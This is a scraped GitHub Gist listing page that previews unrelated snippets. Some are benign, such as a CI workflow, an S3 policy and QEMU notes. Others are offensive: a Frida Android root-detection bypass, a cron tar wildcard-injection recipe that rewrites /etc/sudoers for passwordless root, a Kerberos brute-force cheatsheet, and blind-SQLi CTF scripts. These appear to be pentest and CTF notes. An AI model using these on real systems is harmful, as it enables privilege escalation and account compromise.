Skip to content

Instantly share code, notes, and snippets.

View Anon-Exploiter's full-sized avatar
🎯
Making Memes & writing code :)

Syed Umar Arfeen Anon-Exploiter

🎯
Making Memes & writing code :)
580 followers · 0 following
View GitHub Profile
@ethomson
ethomson / matrix-example.yml
Last active March 5, 2023 12:03
name: CI
on: [push]
jobs:
build:
runs-on: ubuntu-latest
strategy:
matrix:
@djg07
djg07 / gist:1dc4196116e9eb55c40766d4fdc76c3b
Created November 11, 2019 23:34
Resources
S3 PutObject Role
---
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": "s3:PutObject",
"Resource": "*"
@djg07
djg07 / apigateway_lambdahandler.py
Created August 22, 2019 00:36
import json
print('Loading function')
def lambda_handler(event, context):
#1. Parse out query string params
transactionId = event['queryStringParameters']['transactionId']
transactionType = event['queryStringParameters']['type']
transactionAmount = event['queryStringParameters']['amount']
@pich4ya
pich4ya / root_bypass.js
Created August 5, 2019 20:14
Bypass Android Root Detection / Bypass RootBeer - August 2019
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh):
// - I added extra whitelisted items to deal with the latest versions
// of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (kill itself) if Magisk is installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",
@robert-moses
robert-moses / kali-windows-docker-notes.txt
Last active August 11, 2021 04:54
Kali Windows Docker (persistent storage)
docker run -ti --rm --mount src=kali-root,dst=/root --mount src=kali-postgres,dst=/var/lib/postgresql my-kali
#
# Notes to setup/run a persistent kali docker container (my notes to setup on my usual windows work PC)
# credit to @Airman604
# https://medium.com/@airman604/kali-linux-in-a-docker-container-5a06311624eb
# https://hub.docker.com/r/kalilinux/kali-linux-docker/
# https://www.kali.org/news/official-kali-linux-docker-images/
# https://hub.docker.com/?ref=login&overlay=onboarding
# Setup Docker Desktop for Windows
# Requires Windows10 Pro and Hyper-V
@CaptBoykin
CaptBoykin / linux_privesc_cron_tar_wildcard.txt
Last active October 10, 2022 10:09
Cron Tar Wildcard Injection (Linux Privesc)
// https://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/
// This will replace sudoers. Add your user to <INSERT YOUR USER HERE>
echo 'echo "Defaults env_reset" > /etc/sudoers' >> test.sh
echo 'echo "Defaults mail_badpass" >> /etc/sudoers' >> test.sh
echo 'echo "Defaults secure_path=\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin\" ">> /etc/sudoers' >> test.sh
echo 'echo "root ALL=(ALL:ALL) ALL" >> /etc/sudoers' >> test.sh
echo 'echo "%sudo ALL=(ALL:ALL) ALL" >> /etc/sudoers' >> test.sh
echo 'echo "<INSERT YOUR USER HERE> ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' >> test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@carlosplanchon
carlosplanchon / multiparameter_callback.py
Last active July 25, 2022 01:32
#!/usr/bin/env python3
from inspect import _empty, signature
def get_multiparameter_callback(callback, **parameters):
callback_sig_p = signature(callback).parameters
# If some provider parameter does not belong to callback parameters.
unexpected_parameters = list(parameters.keys() - callback_sig_p.keys())
if len(unexpected_parameters) > 0:
@ajxchapman
ajxchapman / README.md
Last active October 22, 2023 16:05
Scripts developed for solving HackerOne H1-702 2019 CTF

Scripts developed for solving HackerOne H1-702 2019 CTF

  • image_extract.py performs character extraction on targetted against the HackerOne H1-702 CTF announcement image
  • decrypt_sqli.py performs blind sqli data extraction with encrypted payloads targetting against the FliteThermostat API
  • timing_attack.py performs an HTTP piplining based timing against the FliteThermostat Backend
  • wordlist_generator.py generates wordlists from a give corpus or set of corpuses
  • httplib.py performs efficient asynchronous HTTP requests against the FliteThermostat Backend
@luk6xff
luk6xff / ARMonQEMUforDebianUbuntu.md
Last active April 23, 2024 17:11 — forked from bruce30262/ARMDebianUbuntu.md
Emulating ARM with QEMU on Debian/Ubuntu

You might want to read this to get an introduction to armel vs armhf.

If the below is too much, you can try Ubuntu-ARMv7-Qemu but note it contains non-free blobs.

Running ARM programs under linux (without starting QEMU VM!)

First, cross-compile user programs with GCC-ARM toolchain. Then install qemu-arm-static so that you can run ARM executables directly on linux

If there's no qemu-arm-static in the package list, install qemu-user-static instead